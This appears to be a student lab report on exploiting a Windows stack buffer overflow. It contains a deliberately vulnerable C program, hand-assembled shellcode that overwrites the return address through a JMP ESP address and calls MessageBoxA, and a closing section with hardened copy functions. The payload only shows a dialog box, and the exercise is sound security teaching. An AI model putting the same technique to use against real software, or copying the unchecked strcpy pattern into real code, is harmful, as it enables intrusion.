Buffer overflow utilization and shellcode writing

Time: 2022-5-9

I. Experimental purpose

  1. Become familiar with the process of writing shellcode
  2. Master the exploitation of a buffer overflow

II. Experimental environment

  1. System environment: Windows
  2. Software environment: C++, the buffer overflow lab files (provided as a link)

III. Experimental principle

  1. To carry out an effective buffer overflow attack, an attacker must complete the following tasks:
    (1) Implant suitable code (called shellcode) into the address space of the program; this code performs the illegal task, such as obtaining control of the system.
    (2) By modifying a register or memory, redirect the program's execution flow to the address of the implanted shellcode so that it is executed.
  2. In the concrete implementation, the buffer overflow is completed in the following steps:
    (1) Find the exact location of the return address
    (2) Find a suitable address with which to overwrite the original return address
    (3) Write the shellcode into the corresponding buffer
    (4) Write shellcode that pops up the attack dialog box

IV. Experimental steps

  • To exploit the buffer overflow vulnerability, we first need to find the exact location of the return address.
    Open the Windows 7 virtual machine and create the overrun DSW project file; the code is as follows:
#include "string.h"
#include "stdio.h"
#include "windows.h"

char name[] = "ABCDEFGH"
              "IJKL"
              "\xB3\x00\x00\x00"      // fill in the obtained JMP ESP instruction address
              "\x33\xDB"              // xor ebx,ebx
              "\x53"                  // push ebx
              "\x68\x69\x6E\x67\x20"  // push 0x20676e69
              "\x68\x57\x61\x72\x6E"  // push 0x6e726157
              "\x8B\xC4"              // mov eax,esp
              "\x53"                  // push ebx
              "\x68\x21\x20\x20\x20"  // push 0x20202021
              "\x68\x63\x6b\x65\x64"  // push 0x64656b63
              "\x68\x6e\x20\x68\x61"  // push 0x6168206e
              "\x68\x20\x62\x65\x65"  // push 0x65656220
              "\x68\x68\x61\x76\x65"  // push 0x65766168
              "\x68\x59\x6f\x75\x20"  // push 0x20756f59
              "\x8B\xCC"              // mov ecx,esp
              "\x53"                  // push ebx
              "\x50"                  // push eax
              "\x51"                  // push ecx
              "\x53"                  // push ebx
              "\xB8\x00\x00\x00\x00"  // MessageBoxA address assigned to eax
              "\xFF\xD0"              // call eax
              "\x53"                  // push ebx
              "\xB8\x00\x00\x00\x00"  // assign the address of the ExitProcess function obtained in the previous experiment to eax
              "\xFF\xD0";             // call eax

int main()
{
    char buffer[8];
    LoadLibrary("user32.dll");
    strcpy(buffer, name);
    printf("%s\n", buffer);
    getchar();
    return 0;
}
  • Get the address of a JMP ESP instruction:
    Open the buffer overflow folder, find the searchjmp folder and load the searhjmpesp DSW project file. Run the program; it lists the addresses of JMP ESP instructions. We pick one of them at random, for example 0x75a0a0b3, as shown in the figure below (figure: Get JMP ESP instruction address).

  • Get the address of the dialog box function (the injected function):
    To call the MessageBoxA dialog box through the vulnerability, we first need the addresses of the relevant functions. Double-click to open the buffer overflow folder, find the searchjmp folder, load the serchfunctionaddr DSW project file and run the program to get the address of each function. The address of MessageBoxA is 0x759aea11 and the address of ExitProcess is 0x76e0214f, as shown in figure 2-2-3. (Modify the code to get the addresses of other API functions.) So that the overflowed program closes normally, we also obtained the address of the ExitProcess function (figure: Got the address of ExitProcess function).

  • Take the JMP ESP instruction address and the dialog box function (injected function) addresses obtained above and substitute them into the overrun cpp file for the JMP ESP instruction address and the MessageBoxA and ExitProcess addresses:

#include "string.h"
#include "stdio.h"
#include "windows.h"

char name[] = "ABCDEFGH"
              "IJKL"
              "\xB3\xA0\xA0\x75"      // the obtained JMP ESP instruction address, 0x75a0a0b3
              "\x33\xDB"              // xor ebx,ebx
              "\x53"                  // push ebx
              "\x68\x69\x6E\x67\x20"  // push 0x20676e69
              "\x68\x57\x61\x72\x6E"  // push 0x6e726157
              "\x8B\xC4"              // mov eax,esp
              "\x53"                  // push ebx
              "\x68\x21\x20\x20\x20"  // push 0x20202021
              "\x68\x63\x6b\x65\x64"  // push 0x64656b63
              "\x68\x6e\x20\x68\x61"  // push 0x6168206e
              "\x68\x20\x62\x65\x65"  // push 0x65656220
              "\x68\x68\x61\x76\x65"  // push 0x65766168
              "\x68\x59\x6f\x75\x20"  // push 0x20756f59
              "\x8B\xCC"              // mov ecx,esp
              "\x53"                  // push ebx
              "\x50"                  // push eax
              "\x51"                  // push ecx
              "\x53"                  // push ebx
              "\xB8\x11\xEA\x9A\x75"  // MessageBoxA address 0x759aea11 assigned to eax
              "\xFF\xD0"              // call eax
              "\x53"                  // push ebx
              "\xB8\x4F\x21\xE0\x76"  // ExitProcess address 0x76e0214f, obtained in the previous experiment, assigned to eax
              "\xFF\xD0";             // call eax

int main()
{
    char buffer[8];
    LoadLibrary("user32.dll");
    strcpy(buffer, name);
    printf("%s\n", buffer);
    getchar();
    return 0;
}
  • Run the overrun program and press the space bar; the dialog box pops up successfully, as shown in the figure below.
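The root cause of the whole exploit is the single unchecked strcpy(buffer, name) into char buffer[8]: the 12 bytes "ABCDEFGHIJKL" fill the buffer and the saved EBP, and the next four bytes land on the saved return address. The lab only works because the VC6 build has no stack cookie and the executable is not opted into DEP or ASLR; note also that system DLL bases are re-randomised at boot on Windows 7, so the addresses found by the helper programs are valid only for the current session. The following is an added example, not part of the lab or its provided files: it measures how far the constructed input would overrun the buffer and shows two hardened replacements for the strcpy call (a rejecting copy and a truncating copy that always NUL-terminates). The input string kOversizedInput is constructed for the example and contains no shellcode.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Size of the stack buffer in the lab's main(): char buffer[8]. */
#define BUF_SIZE 8

/* Constructed stand-in for the lab's oversized `name` string: 12 bytes that
 * fill buffer[8] and the saved EBP, followed by more bytes standing in for
 * the overwritten return address and shellcode. Plain letters only. */
static const char kOversizedInput[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";

/* Number of bytes strcpy(dst, src) would write past a dst buffer of `cap`
 * bytes, counting the terminating NUL. 0 means the copy fits. */
size_t overflow_bytes(const char *src, size_t cap)
{
    size_t needed = strlen(src) + 1;   /* bytes strcpy actually writes */
    return needed > cap ? needed - cap : 0;
}

/* Hardened replacement for the lab's strcpy(buffer, name): the copy is
 * refused outright when the source does not fit, so nothing beyond the
 * buffer (saved EBP, return address) is ever touched.
 * Returns 0 on success, -1 when the input is rejected. */
int safe_copy(char *dst, size_t cap, const char *src)
{
    size_t len = strlen(src);
    if (cap == 0 || len >= cap)
        return -1;                      /* would overflow: reject */
    memcpy(dst, src, len + 1);          /* len + 1 copies the NUL too */
    return 0;
}

/* Truncating alternative for when some form of the input must be accepted:
 * copies at most cap-1 bytes and always NUL-terminates (unlike strncpy).
 * Returns 1 if the input was truncated, 0 if it was copied whole. */
int bounded_copy(char *dst, size_t cap, const char *src)
{
    size_t len = strlen(src);
    if (cap == 0)
        return 1;                       /* nowhere to write, nothing copied */
    if (len >= cap) {
        memcpy(dst, src, cap - 1);
        dst[cap - 1] = '\0';
        return 1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

int main(void)
{
    char buffer[BUF_SIZE];

    printf("strcpy would overrun buffer[%d] by %zu bytes\n",
           BUF_SIZE, overflow_bytes(kOversizedInput, BUF_SIZE));

    if (safe_copy(buffer, sizeof buffer, kOversizedInput) != 0)
        printf("safe_copy: input rejected, stack frame untouched\n");

    if (bounded_copy(buffer, sizeof buffer, kOversizedInput))
        printf("bounded_copy: truncated to \"%s\"\n", buffer);

    return 0;
}
```

Either replacement removes the write past buffer[8], so the return address can no longer be overwritten through this call; the rejecting form is preferable when a truncated value would itself be meaningless or dangerous, while the truncating form suits cases where the caller only needs a display string.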
